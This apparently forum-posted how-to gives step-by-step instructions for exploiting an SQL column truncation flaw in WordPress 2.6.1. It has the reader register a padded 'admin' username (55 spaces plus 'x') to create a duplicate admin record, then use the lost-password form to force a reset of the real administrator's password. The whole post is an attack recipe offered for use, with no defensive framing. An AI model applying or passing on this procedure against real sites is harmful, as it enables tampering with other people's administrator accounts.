please read this about How To WordPress 2.6.1 SQL Column Truncation Vulnerability, but before please read in this link about mysql and sql column truncation vulnerabilities (http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/)
and step is :
1. go to url: server.com/wp-login.php?action=register
2. register as:
login: admin x
email: your email
^ admin[55 space chars]x
now, we have duplicated 'admin' account in database
3. go to url: server.com/wp-login.php?action=lostpassword
4. write your email into field and submit this form
5. check your email and go to reset confirmation link
6. admin's password changed, but new password will be send to correct admin email ;/
thanks to : http://irk4z.wordpress.com/
22 hours ago
